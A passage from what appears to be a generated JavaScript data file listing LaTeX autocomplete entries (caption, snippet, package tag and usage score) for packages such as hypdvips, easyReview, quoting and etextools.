score: 0.001134118016265821, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hypdvips-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'hypdvips-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'hypdvips-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + 
snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'hypdvips-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hypdvips-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'hypdvips-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hypdvips-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'hypdvips-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'hypdvips-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'hypdvips-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hypdvips-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'hypdvips-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypdvips-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'hypdvips-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'hypdvips-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'hypdvips-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'hypdvips-cmd', + score: 0.2864294797053033, + }, + ], + easyReview: [ + { + caption: '\\highlight{}', + snippet: '\\highlight{$1}', + meta: 'easyReview-cmd', + score: 0.00021546602164732416, + }, + { + caption: '\\highlight', + snippet: '\\highlight', + meta: 'easyReview-cmd', + score: 0.00021546602164732416, + }, + { + caption: '\\alert{}', + snippet: '\\alert{$1}', + meta: 'easyReview-cmd', + score: 0.02756568949970745, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: 
'\\expandafter', + meta: 'easyReview-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'easyReview-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'easyReview-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'easyReview-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'easyReview-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'easyReview-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'easyReview-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'easyReview-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'easyReview-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'easyReview-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'easyReview-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'easyReview-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'easyReview-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\missingfigure[]{}', + snippet: '\\missingfigure[$1]{$2}', + meta: 'easyReview-cmd', + score: 0.001558719179721163, + }, + { + caption: '\\missingfigure', + snippet: '\\missingfigure', + meta: 'easyReview-cmd', + score: 0.001558719179721163, + }, + { + caption: '\\todototoc', + snippet: '\\todototoc', + meta: 'easyReview-cmd', + score: 0.000325977535138643, + }, + { + caption: '\\todo{}', + snippet: '\\todo{$1}', + meta: 'easyReview-cmd', + score: 0.04115074278362878, + }, + { + caption: '\\todo[]{}', + snippet: '\\todo[$1]{$2}', + meta: 'easyReview-cmd', + score: 0.04115074278362878, + }, + { + caption: '\\todo', + snippet: '\\todo', + meta: 'easyReview-cmd', + score: 0.04115074278362878, + }, + { + caption: '\\listoftodos', + snippet: '\\listoftodos', + meta: 'easyReview-cmd', + score: 0.0005325975940754609, + }, + { + caption: '\\listoftodos[]', + snippet: '\\listoftodos[$1]', + meta: 'easyReview-cmd', + score: 0.0005325975940754609, + }, + { + caption: '\\phantomsection', + snippet: '\\phantomsection', + meta: 'easyReview-cmd', + score: 0.0174633138331273, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'easyReview-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'easyReview-cmd', + score: 0.021170869458413965, + }, + { + caption: 
'\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'easyReview-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'easyReview-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'easyReview-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'easyReview-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'easyReview-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'easyReview-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'easyReview-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'easyReview-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'easyReview-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'easyReview-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareRobustCommand{}{}', + snippet: '\\DeclareRobustCommand{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.0010373158471650705, + }, + { + caption: '\\DeclareRobustCommand{}[]{}', + snippet: '\\DeclareRobustCommand{$1}[$2]{$3}', + meta: 'easyReview-cmd', + score: 0.0010373158471650705, + }, + { + caption: '\\sethlcolor{}', + snippet: '\\sethlcolor{$1}', + meta: 'easyReview-cmd', + score: 0.01970230898277056, + }, + { + caption: '\\st', + snippet: '\\st', + meta: 'easyReview-cmd', + score: 0.004652662833362787, + }, + { + caption: '\\st{}', + snippet: '\\st{$1}', + meta: 'easyReview-cmd', + score: 0.004652662833362787, + }, + { + caption: '\\def', + snippet: '\\def', + meta: 'easyReview-cmd', + score: 0.21357759092476175, + }, + { + caption: '\\hl{}', + snippet: '\\hl{$1}', + meta: 'easyReview-cmd', + score: 0.03421486301062431, + }, + { + caption: '\\sodef', + snippet: '\\sodef', + meta: 'easyReview-cmd', + score: 0.0017045357696831268, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'easyReview-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\so', + snippet: '\\so', + meta: 'easyReview-cmd', + score: 0.004308800134587786, + }, + { + caption: '\\so{}', + snippet: '\\so{$1}', + meta: 'easyReview-cmd', + score: 0.004308800134587786, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'easyReview-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'easyReview-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'easyReview-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'easyReview-cmd', + score: 
0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'easyReview-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'easyReview-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'easyReview-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'easyReview-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'easyReview-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'easyReview-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'easyReview-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'easyReview-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'easyReview-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'easyReview-cmd', + score: 0.2864294797053033, + }, + ], + quoting: [ + { + caption: '\\par', + snippet: '\\par', + meta: 'quoting-cmd', + score: 0.413853376001159, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'quoting-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'quoting-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'quoting-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'quoting-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'quoting-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'quoting-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'quoting-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'quoting-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'quoting-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'quoting-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'quoting-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'quoting-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'quoting-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'quoting-cmd', + score: 0.0006796212875843042, + }, + { + caption: 
'\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'quoting-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'quoting-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'quoting-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'quoting-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'quoting-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'quoting-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'quoting-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'quoting-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'quoting-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'quoting-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'quoting-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'quoting-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'quoting-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'quoting-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'quoting-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'quoting-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'quoting-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'quoting-cmd', + score: 0.008565354665444157, + }, + ], + fouriernc: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'fouriernc-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'fouriernc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'fouriernc-cmd', + score: 0.021170869458413965, + }, + ], + realboxes: [ + { + caption: '\\Rotatebox{}{}', + snippet: '\\Rotatebox{$1}{$2}', + meta: 'realboxes-cmd', + score: 1.8920528094586312e-5, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'realboxes-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'realboxes-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'realboxes-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'realboxes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'realboxes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'realboxes-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'realboxes-cmd', + 
score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'realboxes-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'realboxes-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\shadowbox{}', + snippet: '\\shadowbox{$1}', + meta: 'realboxes-cmd', + score: 0.00107667147399019, + }, + { + caption: '\\doublebox', + snippet: '\\doublebox', + meta: 'realboxes-cmd', + score: 0.00015142240898356106, + }, + { + caption: '\\VerbatimEnvironment', + snippet: '\\VerbatimEnvironment', + meta: 'realboxes-cmd', + score: 4.5350034239275855e-5, + }, + { + caption: '\\thisfancypage{}{}', + snippet: '\\thisfancypage{$1}{$2}', + meta: 'realboxes-cmd', + score: 0.00015142240898356106, + }, + { + caption: '\\TheSbox', + snippet: '\\TheSbox', + meta: 'realboxes-cmd', + score: 4.5350034239275855e-5, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'realboxes-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'realboxes-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'realboxes-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'realboxes-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'realboxes-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'realboxes-cmd', + score: 0.0018957469739775527, + }, + ], + etextools: [ + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'etextools-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'etextools-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'etextools-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'etextools-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'etextools-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'etextools-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'etextools-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'etextools-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'etextools-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'etextools-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'etextools-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'etextools-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'etextools-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'etextools-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + 
snippet: '\\preto{$1}{$2}', + meta: 'etextools-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'etextools-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'etextools-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'etextools-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'etextools-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'etextools-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'etextools-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'etextools-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'etextools-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\reserveinserts{}', + snippet: '\\reserveinserts{$1}', + meta: 'etextools-cmd', + score: 0.0018653410309739879, + }, + { + caption: '\\newtoks', + snippet: '\\newtoks', + meta: 'etextools-cmd', + score: 0.00031058155311734754, + }, + ], + ccaption: [ + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'ccaption-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'ccaption-cmd', + score: 1.897791904799601, + }, + ], + exercise: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'exercise-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'exercise-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'exercise-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'exercise-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'exercise-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'exercise-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'exercise-cmd', + score: 0.00037306820619479756, + }, + ], + slantsc: [ + { + caption: '\\scshape', + snippet: '\\scshape', + meta: 'slantsc-cmd', + score: 0.05364108855914402, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'slantsc-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'slantsc-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'slantsc-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'slantsc-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'slantsc-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'slantsc-cmd', + score: 0.0018957469739775527, + }, + ], + 'glossary-longbooktabs': [ + { + caption: '\\specialrule{}{}{}', + snippet: '\\specialrule{$1}{$2}{$3}', + meta: 'glossary-longbooktabs-cmd', + score: 0.004974385202605165, + 
}, + { + caption: '\\cmidrule', + snippet: '\\cmidrule', + meta: 'glossary-longbooktabs-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\cmidrule{}', + snippet: '\\cmidrule{$1}', + meta: 'glossary-longbooktabs-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\bottomrule', + snippet: '\\bottomrule', + meta: 'glossary-longbooktabs-cmd', + score: 0.04533364657852219, + }, + { + caption: '\\midrule', + snippet: '\\midrule', + meta: 'glossary-longbooktabs-cmd', + score: 0.07098077735912875, + }, + { + caption: '\\addlinespace', + snippet: '\\addlinespace', + meta: 'glossary-longbooktabs-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\addlinespace[]', + snippet: '\\addlinespace[$1]', + meta: 'glossary-longbooktabs-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\toprule', + snippet: '\\toprule', + meta: 'glossary-longbooktabs-cmd', + score: 0.059857788139528495, + }, + { + caption: '\\endhead', + snippet: '\\endhead', + meta: 'glossary-longbooktabs-cmd', + score: 0.0023853501147448834, + }, + { + caption: '\\endfoot', + snippet: '\\endfoot', + meta: 'glossary-longbooktabs-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'glossary-longbooktabs-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'glossary-longbooktabs-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\nopagebreak', + snippet: '\\nopagebreak', + meta: 'glossary-longbooktabs-cmd', + score: 9.952664522415981e-5, + }, + { + caption: '\\endfirsthead', + snippet: '\\endfirsthead', + meta: 'glossary-longbooktabs-cmd', + score: 0.0016148498709822416, + }, + { + caption: '\\endlastfoot', + snippet: '\\endlastfoot', + meta: 'glossary-longbooktabs-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'glossary-longbooktabs-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\tablename', + snippet: '\\tablename', + meta: 'glossary-longbooktabs-cmd', + score: 0.0029238994233674776, + }, + { + caption: '\\pagebreak', + snippet: '\\pagebreak', + meta: 'glossary-longbooktabs-cmd', + score: 0.0313525090421608, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'glossary-longbooktabs-cmd', + 